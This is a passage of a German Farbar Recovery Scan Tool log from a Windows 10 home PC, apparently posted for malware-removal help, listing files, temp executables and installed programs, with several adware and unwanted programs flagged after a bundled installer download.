2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Program Files (x86)\Druciy
2017-02-12 22:13 - 2017-02-13 19:06 - 00000000 ____D C:\Program Files (x86)\da002918-daba-4445-a323-cc3eefdf9d091486934027
2017-02-12 22:13 - 2017-02-12 22:24 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Zrshfcit
2017-02-12 22:13 - 2017-02-12 22:24 - 00000000 ____D C:\ProgramData\Hayzumflex
2017-02-12 22:13 - 2017-02-12 22:24 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
2017-02-12 22:13 - 2017-02-12 22:15 - 07319040 _____ C:\Users\Barbara\AppData\Roaming\agent.dat
2017-02-12 22:13 - 2017-02-12 22:15 - 00126464 _____ C:\Users\Barbara\AppData\Roaming\noah.dat
2017-02-12 22:13 - 2017-02-12 22:15 - 00070752 _____ C:\Users\Barbara\AppData\Roaming\Config.xml
2017-02-12 22:13 - 2017-02-12 22:15 - 00018432 _____ C:\Users\Barbara\AppData\Roaming\Main.dat
2017-02-12 22:13 - 2017-02-12 22:15 - 00005568 _____ C:\Users\Barbara\AppData\Roaming\md.xml
2017-02-12 22:13 - 2017-02-12 22:15 - 00002398 _____ C:\WINDOWS\SysWOW64\findit.xml
2017-02-12 22:13 - 2017-02-12 22:15 - 00000002 _____ C:\END
2017-02-12 22:13 - 2017-02-12 22:14 - 00016224 _____ C:\Users\Barbara\AppData\Roaming\InstallationConfiguration.xml
2017-02-12 22:13 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\{e96-e1-84-c5451-ad240-9cea-aa139}
2017-02-12 22:13 - 2017-02-12 22:14 - 00000000 ____D C:\ProgramData\NetworkPacketManitor
2017-02-12 22:13 - 2017-02-12 22:13 - 01907481 _____ C:\Users\Barbara\AppData\Roaming\Fresh-Tom.tst
2017-02-12 22:13 - 2017-02-12 22:13 - 00983040 _____ C:\Users\Barbara\AppData\Roaming\Fresh-Tom.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 00278520 _____ C:\Users\Barbara\AppData\Roaming\Singleity.bin
2017-02-12 22:13 - 2017-02-12 22:13 - 00140288 _____ C:\Users\Barbara\AppData\Roaming\Installer.dat
2017-02-12 22:13 - 2017-02-12 22:13 - 00016812 _____ C:\WINDOWS\System32\Tasks\108l42A89c7603
2017-02-12 22:13 - 2017-02-12 22:13 - 00006098 _____ C:\WINDOWS\System32\Tasks\Atikationbogot System
2017-02-12 22:13 - 2017-02-12 22:13 - 00003782 _____ C:\WINDOWS\System32\Tasks\Pregehabering
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ___HD C:\ProgramData\108l42A89c7603
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Note-UP
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Local\Qolther
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Local\Ghuversp
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\ProgramData\Hayzumflexs
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files\WR5TG73LV7
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files\P3ZUK80JKY
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files\IQ50062YNB
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Thteckganoied
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Plidaing
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\MyMemory
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\BeCleaner
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Atikationbogot System
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 _____ C:\TOSTACK
2017-02-12 21:59 - 2017-02-12 22:08 - 70965739 _____ (eRightSoft ) C:\Users\Barbara\Downloads\SUPERsetup.exe
2017-02-11 17:30 - 2017-02-11 17:30 - 11617413 _____ C:\Users\Barbara\Downloads\ColorSplash (1).themepack
2017-02-11 17:29 - 2017-02-11 17:29 - 11617413 _____ C:\Users\Barbara\Downloads\ColorSplash.themepack
2017-02-11 17:29 - 2017-02-11 17:29 - 08635521 _____ C:\Users\Barbara\Downloads\DreamgardenChristinaManchenko.themepack
2017-02-10 16:16 - 2017-02-10 16:16 - 03287737 _____ C:\WINDOWS\fb8637bc1a4671a0ade9e7275e924c95.exe
2017-02-10 16:12 - 2017-02-10 16:12 - 00095048 _____ (REMFFW) C:\WINDOWS\system32\Drivers\f200152859a3da102f1abf6a29e00daf.sys
2017-02-09 13:38 - 2017-02-12 20:33 - 00000000 ____D C:\WINDOWS\LastGood
2017-02-09 13:38 - 2017-02-09 13:38 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-02-09 13:38 - 2017-01-04 15:24 - 00222648 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-02-09 13:38 - 2016-12-29 13:43 - 00133056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-02-09 13:38 - 2016-09-09 19:25 - 00269600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-02-09 13:38 - 2016-09-09 19:25 - 00261920 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-02-09 13:38 - 2016-09-09 19:25 - 00110880 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-02-09 13:38 - 2016-09-09 19:24 - 00125216 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-02-09 10:03 - 2017-02-09 10:03 - 00069400 _____ (Lace514) C:\WINDOWS\system32\Drivers\Lace_wpf_x64.sys
2017-02-03 17:19 - 2017-02-03 17:19 - 00515204 _____ C:\WINDOWS\Minidump\020317-6328-01.dmp
2017-02-03 17:12 - 2017-02-03 17:12 - 00004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2017-02-03 17:12 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-02-03 17:12 - 2017-02-03 17:12 - 00000000 ____D C:\Users\Barbara\AppData\Local\Chromium
2017-02-03 17:12 - 2017-01-20 19:39 - 00156608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-02-03 17:12 - 2017-01-20 19:39 - 00124352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-02-03 17:12 - 2017-01-20 19:39 - 00057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-02-03 17:12 - 2017-01-20 14:36 - 00001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-01-26 18:15 - 2017-01-26 18:17 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\elsterformular
2017-01-26 18:15 - 2017-01-26 18:17 - 00000000 ____D C:\ProgramData\elsterformular
2017-01-26 18:15 - 2017-01-26 18:15 - 00001302 ____N C:\Users\Public\Desktop\ElsterFormular.lnk
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\Program Files (x86)\ElsterFormular Update Service
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\Program Files (x86)\ElsterFormular
2017-01-26 18:13 - 2017-01-26 18:15 - 67816592 _____ (Landesfinanzdirektion Thüringen) C:\Users\Barbara\Downloads\ElsterFormularPrivat.exe
2017-01-25 13:39 - 2016-12-21 08:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2017-01-25 13:39 - 2016-12-21 05:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-02-13 19:06 - 2016-09-23 02:40 - 00000000 ____D C:\ProgramData\NVIDIA
2017-02-13 19:05 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-02-12 22:25 - 2016-11-26 12:11 - 00000000 ____D C:\Users\Barbara\AppData\LocalLow\Mozilla
2017-02-12 22:24 - 2016-09-23 02:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-02-12 22:24 - 2016-07-16 07:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-02-12 22:15 - 2016-07-30 11:41 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\NVIDIA
2017-02-12 22:13 - 2016-11-25 17:30 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-02-12 22:13 - 2016-07-30 13:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Witcher 2
2017-02-12 22:13 - 2016-07-30 09:02 - 00002028 ____R C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk
2017-02-12 22:12 - 2016-07-30 09:48 - 00000000 ____D C:\Users\Barbara\AppData\Local\Spotify
2017-02-12 21:45 - 2016-09-23 02:40 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-02-12 20:33 - 2016-07-30 09:47 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Spotify
2017-02-12 20:33 - 2016-07-16 12:45 - 00000000 ____D C:\WINDOWS\INF
2017-02-12 09:48 - 2016-07-30 09:24 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrashDumps
2017-02-11 12:51 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-10 11:44 - 2016-07-16 12:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-09 13:42 - 2016-09-23 02:41 - 02284542 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-09 13:42 - 2016-07-16 23:51 - 00892132 _____ C:\WINDOWS\system32\perfh007.dat
2017-02-09 13:42 - 2016-07-16 23:51 - 00212864 _____ C:\WINDOWS\system32\perfc007.dat
2017-02-09 13:39 - 2016-09-23 02:40 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-02-09 13:39 - 2016-07-30 09:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-02-09 13:38 - 2016-09-23 02:40 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-02-09 13:38 - 2016-09-23 02:40 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-02-09 13:38 - 2016-07-30 09:20 - 00000000 ____D C:\Users\Barbara\AppData\Local\NVIDIA Corporation
2017-02-03 17:19 - 2016-11-13 21:39 - 1291434677 _____ C:\WINDOWS\MEMORY.DMP
2017-02-03 17:19 - 2016-11-13 21:39 - 00000000 ____D C:\WINDOWS\Minidump
2017-02-03 17:19 - 2016-09-23 02:41 - 00000000 ____D C:\Users\Barbara
2017-02-03 17:19 - 2016-07-30 09:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-02-03 17:18 - 2016-07-30 10:12 - 00000000 ____D C:\ProgramData\Origin
2017-02-03 17:14 - 2016-07-30 09:57 - 00000000 ____D C:\Program Files (x86)\Steam
2017-02-03 17:13 - 2016-07-30 10:16 - 00000000 ____D C:\Users\Barbara\AppData\Local\Origin
2017-02-03 17:12 - 2016-10-13 07:34 - 00003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003884 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-07-30 09:19 - 00000000 ____D C:\Users\Barbara\AppData\Local\NVIDIA
2017-01-25 13:43 - 2016-07-16 12:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-21 11:40 - 2016-12-16 18:33 - 00003284 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-01-21 11:40 - 2016-07-30 08:18 - 00002429 ____N C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-01-21 11:40 - 2016-07-30 08:18 - 00000000 ___RD C:\Users\Barbara\OneDrive
2017-01-20 19:39 - 2016-10-13 07:34 - 01872320 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01464768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 00120256 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 00046016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-01-20 19:17 - 2016-11-16 20:05 - 00002457 ____N C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2016-09-02 15:48 - 2016-10-11 12:28 - 0000337 _____ () C:\Users\Barbara\AppData\Roaming\2E7BF6-326E-4870-B5B1-B11758EC2B1D.ini
2017-02-12 22:13 - 2017-02-12 22:15 - 7319040 _____ () C:\Users\Barbara\AppData\Roaming\agent.dat
2017-02-12 22:13 - 2017-02-12 22:14 - 0023622 _____ () C:\Users\Barbara\AppData\Roaming\aliexpress.ico
2017-02-12 22:14 - 2017-02-12 22:14 - 1938537 _____ () C:\Users\Barbara\AppData\Roaming\Bioity.bin
2017-02-12 22:13 - 2017-02-12 22:13 - 0099678 _____ () C:\Users\Barbara\AppData\Roaming\booking.ico
2017-02-12 22:13 - 2017-02-12 22:15 - 0070752 _____ () C:\Users\Barbara\AppData\Roaming\Config.xml
2017-02-12 22:15 - 2017-02-12 22:14 - 0983040 _____ () C:\Users\Barbara\AppData\Roaming\Flex-Fix.exe
2017-02-12 22:15 - 2017-02-12 22:15 - 1907481 _____ () C:\Users\Barbara\AppData\Roaming\Flex-Fix.tst
2017-02-12 22:13 - 2017-02-12 22:13 - 0983040 _____ () C:\Users\Barbara\AppData\Roaming\Fresh-Tom.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 1907481 _____ () C:\Users\Barbara\AppData\Roaming\Fresh-Tom.tst
2017-02-12 22:13 - 2017-02-12 22:14 - 0016224 _____ () C:\Users\Barbara\AppData\Roaming\InstallationConfiguration.xml
2017-02-12 22:13 - 2017-02-12 22:13 - 0140288 _____ () C:\Users\Barbara\AppData\Roaming\Installer.dat
2017-02-12 22:13 - 2017-02-12 22:15 - 0018432 _____ () C:\Users\Barbara\AppData\Roaming\Main.dat
2017-02-12 22:13 - 2017-02-12 22:15 - 0005568 _____ () C:\Users\Barbara\AppData\Roaming\md.xml
2017-02-12 22:13 - 2017-02-12 22:15 - 0126464 _____ () C:\Users\Barbara\AppData\Roaming\noah.dat
2017-02-12 22:13 - 2017-02-12 22:13 - 0278520 _____ () C:\Users\Barbara\AppData\Roaming\Singleity.bin
2017-02-12 22:14 - 2017-02-12 22:14 - 0278520 _____ () C:\Users\Barbara\AppData\Roaming\SonZoolux.bin
2017-02-12 22:15 - 2017-02-12 22:15 - 1938537 _____ () C:\Users\Barbara\AppData\Roaming\Tonex.bin
2017-02-12 22:14 - 2017-02-12 22:15 - 0032038 _____ () C:\Users\Barbara\AppData\Roaming\uninstall_temp.ico
2017-02-12 22:16 - 2017-02-12 22:16 - 0326144 _____ () C:\ProgramData\smp2.exe
Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\Program Files (x86)\BeCleaner\BestCleaner.exe
C:\Program Files (x86)\MyMemory\MyMemory.exe
C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe
C:\Program Files (x86)\BeCleaner\9J3PGU1187X4TMA.exe
C:\Users\Barbara\AppData\Local\Temp\gCEF9.tmp.exe
C:\ProgramData\smp2.exe
Einige Dateien in TEMP:
====================
2017-02-12 22:14 - 2017-02-12 22:14 - 1171283 _____ ( ) C:\Users\Barbara\AppData\Local\Temp\4E1F.tmp.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 0425674 _____ (WeMonetize ) C:\Users\Barbara\AppData\Local\Temp\EQMVNUA.exe
2017-02-12 22:14 - 2017-02-12 22:14 - 3030016 _____ () C:\Users\Barbara\AppData\Local\Temp\fsdDC2B.exe
2017-02-12 22:14 - 2017-02-12 22:14 - 0257536 _____ () C:\Users\Barbara\AppData\Local\Temp\gA1BE.tmp.exe
2017-02-12 22:14 - 2017-02-12 22:15 - 0248320 _____ () C:\Users\Barbara\AppData\Local\Temp\gCEF9.tmp.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 0745123 _____ ( ) C:\Users\Barbara\AppData\Local\Temp\global_installer.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 0115900 _____ () C:\Users\Barbara\AppData\Local\Temp\load.exe
2016-10-13 07:34 - 2016-09-30 05:25 - 0950328 _____ (NVIDIA Corporation) C:\Users\Barbara\AppData\Local\Temp\NvTelemetry.dll
2016-10-13 07:34 - 2016-09-30 05:25 - 0198200 _____ (NVIDIA Corporation) C:\Users\Barbara\AppData\Local\Temp\NvTelemetryAPI32.dll
2016-10-13 07:34 - 2016-09-30 05:25 - 0242232 _____ (NVIDIA Corporation) C:\Users\Barbara\AppData\Local\Temp\NvTelemetryAPI64.dll
2017-02-12 22:13 - 2017-02-12 22:14 - 9753136 _____ () C:\Users\Barbara\AppData\Local\Temp\wajam_install.exe
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-02-09 13:37
==================== Ende von FRST.txt ============================
| addition.txt Zitat:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 12-02-2017
durchgeführt von Barbara (13-02-2017 19:07:37)
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Windows 10 Pro Version 1607 (X64) (2016-09-23 01:45:25)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1500252791-3377746768-789393517-500 - Administrator - Disabled)
Barbara (S-1-5-21-1500252791-3377746768-789393517-1000 - Administrator - Enabled) => C:\Users\Barbara
DefaultAccount (S-1-5-21-1500252791-3377746768-789393517-503 - Limited - Disabled)
Gast (S-1-5-21-1500252791-3377746768-789393517-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1500252791-3377746768-789393517-1002 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.023.20056 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Illustrator CS3 (HKLM-x32\...\Adobe_c015d5ef39552390a753ee735d16041) (Version: 13.0 - Adobe Systems Incorporated)
Ansel (Version: 368.81 - NVIDIA Corporation) Hidden
AppTrailers - AppTrailers for Desktop (HKLM-x32\...\AppTrailers) (Version: 9.1.10amt - AppTrailers) <==== ACHTUNG
ARCHline 2015 15.0.1.239 (HKLM\...\{526F8F65-6A69-4683-AA88-42BB3321C625}_is1) (Version: - IT-Concept Software GmbH)
BeCleaner version 1.0 (HKLM-x32\...\BeCleaner_is1) (Version: 1.0 - WeMonetize) <==== ACHTUNG
CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.0.2.18.20170123 - Landesfinanzdirektion Thüringen)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - )
Fliqlo Bildschirmschoner (HKLM-x32\...\Fliqlo) (Version: - )
HDWallPaper 1.0 (HKLM-x32\...\HDWallPaper_is1) (Version: 1.0.0.78 - HDWallPaper) <==== ACHTUNG
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
LibreOffice 5.0.6.3 (HKLM-x32\...\{900D9036-4EDA-45EC-A095-E8AFB25D807A}) (Version: 5.0.6.3 - The Document Foundation)
Mein CEWE FOTOBUCH (HKLM-x32\...\Mein CEWE FOTOBUCH) (Version: 6.1.5 - CEWE Stiftung u Co. KGaA)
MFCDLL Shared Library - Retail Version (x32 Version: 6.0.8665.0 - Unknown) Hidden
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 51.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 de)) (Version: 51.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1.6234 - Mozilla)
MyMemory (HKLM-x32\...\MyMemory) (Version: - MyMemory) <==== ACHTUNG
MyMemory (HKLM-x32\...\MyMemoryPackage) (Version: - ) <==== ACHTUNG
NVIDIA 3D Vision Controller-Treiber 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.53 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.3.0.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.3.0.95 - NVIDIA Corporation)
NVIDIA Grafiktreiber 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.53 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.3.0.95 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.3.5.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
One System Care (HKLM-x32\...\OneSystemCare) (Version: 4.4.0.3 - OneSystemCare) <==== ACHTUNG
Origin (HKLM-x32\...\Origin) (Version: 9.12.1.43352 - Electronic Arts, Inc.)
OtherSearch (HKLM-x32\...\OtherSearch) (Version: 4.0.0.0 - Skyler Emil) <==== ACHTUNG
PC Clean Plus (HKLM-x32\...\PC Clean Plus_is1) (Version: 3.6 - pccleanplus.com) <==== ACHTUNG
pccleanplus (HKLM\...\pccleanplus) (Version: 0.4 - pccleanplus) <==== ACHTUNG
PDF Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.87.529.2014 - Realtek)
SafeFinder (HKLM-x32\...\{3FD1E972-E180-4283-B899-77FA9D54F00B}) (Version: 1.0.0.0 - Linkury) <==== ACHTUNG
SafeFinder (HKLM-x32\...\{6D106813-D0F9-45FC-A4DB-44471E3CB518}) (Version: 1.0.0.0 - Linkury) <==== ACHTUNG
Search module (HKLM-x32\...\Search module) (Version: - Goobzo) <==== ACHTUNG
Sentinel System Driver Installer 7.5.7 (HKLM-x32\...\{B281C7D1-C088-40E0-86EA-B2D9D7E0810A}) (Version: 7.5.7 - SafeNet, Inc.)
SHIELD Streaming (Version: 7.1.0351 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.3.0.95 - NVIDIA Corporation) Hidden
SketchUp 2016 (HKLM\...\{6ECFED2E-6329-484A-9B08-14ED7F2D65BE}) (Version: 16.1.1449 - Trimble Navigation Limited)
Social2Search (HKLM\...\75c01d6e164de53703a6a972b8072a72) (Version: 11.12.1.334 (i1.0) - Social2Search) <==== ACHTUNG
Spotify (HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Spotify) (Version: 1.0.45.186.g3b5036d6 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
System Healer (HKLM-x32\...\SystemHealer) (Version: 4.4.0.3 - SystemHealer) <==== ACHTUNG
The Witcher 2 Enhanced Edition Version 3.0 (HKLM-x32\...\The Witcher 2 Enhanced Edition_is1) (Version: 3.0 - CD Projekt RED)
trotux - Uninstall (HKLM-x32\...\{2CC964FF-0CCA-4C86-8DD0-6D65C37ABE13}) (Version: - ) <==== ACHTUNG
VC User ATL71 RTL X86 --- (x32 Version: 1.0 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
WinRAR 5.31 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
youndoo - Uninstall (HKLM-x32\...\{1554B7C0-A18B-4D6E-B3F3-0F98906018EE}) (Version: - ) <==== ACHTUNG
youndoo - Uninstall (HKLM-x32\...\{1AD282B9-028B-45EA-8EAD-0BA76533C400}) (Version: - ) <==== ACHTUNG
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
